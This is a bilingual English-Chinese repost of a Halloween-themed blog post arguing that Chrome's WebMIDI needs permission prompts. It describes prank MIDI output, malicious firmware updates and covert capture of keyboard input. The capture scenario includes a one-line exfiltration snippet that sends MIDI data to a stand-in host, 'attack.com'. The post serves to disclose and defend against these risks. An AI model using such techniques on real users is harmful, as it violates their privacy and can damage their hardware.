恶梦护士 asa_WebMIDI的噩梦场景

恶梦护士 asa

In the spirit of Halloween... allow me to entertain you with some security and privacy nightmares with the way WebMIDI is implemented in Chrome currently.

本着万圣节的精神，...让我利用目前在Chrome中实现WebMIDI的方式为您带来一些安全和隐私方面的噩梦。

The spec says: "The suggested security model explicitly allows user agents to require the user's approval before giving access to MIDI devices, although it is not currently required to prompt the user for this approval"

规范说：“建议的安全模型明确允许用户代理在允许访问MIDI设备之前要求用户的批准，尽管当前不需要提示用户进行此批准”。

I think the UA should require approval and below are 3 (+1) scenarios showing how things can go wrong. The overall idea is that using WebMIDI you can read MIDI messages from various devices (so you can think of it as kinda like a microphone) and you can send MIDI messages too, making hardware around the user do something for you (the attacker).

我认为UA应该需要批准，下面是3(+1)个场景，这些场景说明了如何出错。总体思路是，使用WebMIDI可以从各种设备读取MIDI消息(因此，您可以将其视为类似于麦克风)，并且还可以发送MIDI消息，从而使用户周围的硬件为您(攻击者)做些事情。

1.恶作剧 (1. Prank)

Check out what I did in the previous post:

看看我在上一篇文章中做了什么：

演示地址

This is a demo of using a simple bit of JavaScript to send random MIDI messages to a control surface that happens to be attached to the computer. The user doesn't need to allow the messages to be sent. The attacker doesn't need to fingerprint the device, just enumerate all devices and send junk to the [0] one.

这是一个演示，它使用一些简单JavaScript将随机MIDI消息发送到恰好连接到计算机的控制面。用户不需要允许发送消息。攻击者无需对设备进行指纹识别，只需枚举所有设备并将垃圾发送到[0] 。

Imagine you work at a studio that has a similar MIDI control surface. Most studios do. You go to a random page that promises cats. You can almost sense the upcoming entertainment value. Suddenly your control surface starts moving randomly! Even without Yoda in the vocal booth. How freaky is this!

假设您在具有类似MIDI控制界面的工作室工作。大多数工作室都这样做。您进入了答应猫的随机页面。您几乎可以感觉到即将到来的娱乐价值。突然，您的控制面板开始随机移动！即使在声带上没有尤达。这有多怪异！

How may planets need to align for this to happen? Some. You need to have a control surface or any other MIDI device plugged into the computer.

为了实现这一点，行星可能需要如何调整？ 一些。您需要将控制面板或任何其他MIDI设备插入计算机。

Impact? Fairly limited beyond the prank value. Could be irritating to return the controls to where you had them before, but you have backups of the DAW (Digital Audio Workstation) session, right? Right?!

有影响吗？ 超出恶作剧的价值还算有限。将控件返回到以前的位置可能会很烦人，但是您拥有DAW(数字音频工作站)会话的备份，对吗？对？！

1.1。恶作剧++ (1.1. Prank++)

A small variation of this is if the victim has a device capable of making noise. Like a digital piano. Imagine it's dark, past midnight. The victim just managed to put the baby to bed. Quiet, very quiet. The victim decides to relieve a bit of the stress of putting the baby to sleep with some light entertainment that includes cats. Suddenly the keyboard starts playing (way too loud - yup, another lucky MIDI message) the Star Wars theme! Or Wagner's Ride of the Valkyries. TAA-DA, TA-TADADAAA-DA, DAT-DA-DA-DAAAA!

如果受害者具有能够发出声音的设备，则这是一个很小的变化。就像数码钢琴一样。想象一下，天黑了，午夜过后。受害人刚刚设法把婴儿上床睡觉。安静，很安静。受害人决定通过一些轻便的娱乐活动(包括猫)来减轻让婴儿入睡的压力。突然，键盘开始播放“星球大战”主题(声音太大-是的，另一个幸运的MIDI消息)！或瓦格纳的女武神之旅。 TAA-DA，TA-TADADAAA-DA，DAT-DA-DA-DAAAA！

The house is up in arms, the baby cries, the spouse blames. Oh, the pain, the horror!

房子在怀里，婴儿哭了，配偶责备。哦，痛苦，恐怖！

Bonus scenario - other than baby trouble, the victim's great-grandma just passed away and the victim was thinking of her. Missing her. Hoping she's still around. And her favorite piece was The Ride of the Valkyries... spooooky...

奖励方案-除了婴儿麻烦以外，受害人的曾祖母刚刚去世，受害人还在想着她。缺少了她。希望她还在。她最喜欢的作品是《女武神的骑》

How may planets need to align for this to happen? Some. You need a MIDI device that makes sounds plugged into the computer.

为了实现这一点，行星可能需要如何调整？ 一些。您需要使声音插入计算机的MIDI设备。

Impact? Fairly limited beyond the prank value. Or is it a heart attack? A special facility for the victim who believes in ghosts of dead people playing the piano?

有影响吗？ 超出恶作剧的价值还算有限。还是心脏病发作？对于相信死者会弹钢琴的受害者的特殊设施？

2.搞乱固件 (2. Mess up firmware)

The control surface in the video above is a Mackie. Now dig this - the way to install a firmware update to the Mackie hardware is by playing a MIDI file! Whaaa. Yup, look it up. That's amazing. This means you (as a hardware developer) can tell people to come to your page, click a <button> and upgrade their hardware. That's so much simpler than downloading a zip with a MIDI and PDF, reading and following the instructions of how exactly to play the MIDI and how to route stuff in your DAW so it works.

上面视频中的控制界面是Mackie 。现在开始研究-将固件更新安装到Mackie硬件的方法是播放MIDI文件！哇是的，抬头看。棒极了。这意味着您(作为硬件开发人员)可以告诉人们进入您的页面，单击<button>并升级他们的硬件。这比下载带有MIDI和PDF的zip，阅读并遵循有关如何正确播放MIDI以及如何在DAW中路由内容的说明要简单得多。

This is great news for hardware devs but also great news for an attacker. Maybe they can install an update you don't want. Maybe they can figure out an update sequence that renders your hardware unusable. Since there's no user consent, nothing can stop them. One cat page and your device stops working...

对于硬件开发人员而言，这是个好消息，对于攻击者而言，这也是个好消息。也许他们可以安装您不想要的更新。也许他们可以找出导致您的硬件无法使用的更新顺序。由于没有用户的同意，所以没有什么可以阻止他们。一页的页面，您的设备停止工作...

How may planets need to align for this to happen? Most. You need a MIDI device that takes firmware updates in the form of MIDI messages. And (in the case of the Mackie) the device is restarted in "boot mode" which allows it to accept said messages and act on them.

为了实现这一点，行星可能需要如何调整？ 最。您需要一个MIDI设备，该设备以MIDI消息的形式获取固件更新。并且(在Mackie的情况下)设备以“启动模式”重新启动，这使其可以接受所述消息并对其进行操作。

Impact? Could be nasty if someone messes up your hardware. Cost to repair, lost income for a studio facility... A competitor running an organized attack against all clients of the vulnerable hardware and making the news your hardware is unreliable

有影响吗？ 如果有人弄乱了您的硬件，可能会很讨厌。维修成本，工作室设施的收入损失...竞争对手对有漏洞的硬件的所有客户端进行有组织的攻击，并以新闻形式通知您的硬件不可靠

3. p0wn Kanye的下一个热门(3. p0wn Kanye's next hit)

K, so the cases above were about sending MIDI messages. Let's wrap up with one where the attacker reads MIDI messages.

K，因此上述情况与发送MIDI信息有关。让我们总结一下攻击者读取MIDI消息的地方。

You tweet Kanye West a link to an article, which talks about how great he is (in addition to all the cats, naturally). He loads your page, you give him cats and a long "Loading..." animation. He wants to read how great he is but gets bored waiting. He reaches the nearest keyboard and starts playing his upcoming hit melody he's been working so hard to perfect. The keyboard is connected to the computer and it starts sending your cat page MIDI messages. You listen, new Image().src = 'attack.com?midi=[144,123,12][128,12,14].... the melody to you, record it and put it up on Spotify later that night. Kanye still waits for the page to load while you laugh all the way to the bank to cache the royalties from the hit. Or because you ain't got no fans and your version of the song is awful, it's not a hit. You make 0 money. So you wait for Kanye's version to explode and then sue him because he blatantly stole from your song released weeks ago.

您在推特上给Kanye West发了一条推文，其中包含一篇文章的链接，其中谈到了他有多伟大(自然而然地除了所有的猫)。他加载了您的页面，您给了他猫和一个长长的“正在加载...”动画。他想读自己的才华，但无聊的等待。他一直到最近的键盘，并开始演奏即将来临的打击乐，他一直在努力地完善自己。键盘已连接到计算机，并开始发送猫页面MIDI消息。您听着， new Image().src = 'attack.com?midi=[144,123,12][128,12,14]....旋律，记录下来，并于当晚晚些时候放在Spotify上。 Kanye仍在等待页面加载，而您却一直笑到银行以缓存点击的版税。或者，因为您没有粉丝，而且您的歌曲版本很糟糕，因此并不受欢迎。您赚了0钱。因此，您要等Kanye的版本爆炸后再提出起诉，因为他公然偷走了几周前发布的歌曲。

Because there's no user approval, nowhere in the process was Kanye aware that his keyboard was bugged. By a web page!

由于没有用户的批准，Kanye在此过程中没有任何地方意识到他的键盘有问题。通过网页！

How may planets need to align for this to happen? Not that many. You need one Kanye playing and one keyboard attached to the computer.

为了实现这一点，行星可能需要如何调整？ 不是很多您需要一个Kanye演奏和一个连接到计算机的键盘。

Impact? Stealing intellectual property at worst, privacy snooping at best.

有影响吗？ 最糟糕的是窃取知识产权，最好的是窃听隐私。

是的 (yeah...)

I hate clicking on permission prompts as much as the next person, but I think in this case we need one (to send MIDI messages and another one to receive 'em). Thanks for reading!

我讨厌点击权限提示，就像下一个人一样，但是我认为在这种情况下，我们需要一个(发送MIDI消息，另一个需要接收'em)。谢谢阅读！

Tell your friends about this post on Facebook and Twitter

在Facebook和Twitter上告诉您的朋友有关此帖子的信息

翻译自: https://www.phpied.com/nightmare-scenarios-with-webmidi/

恶梦护士 asa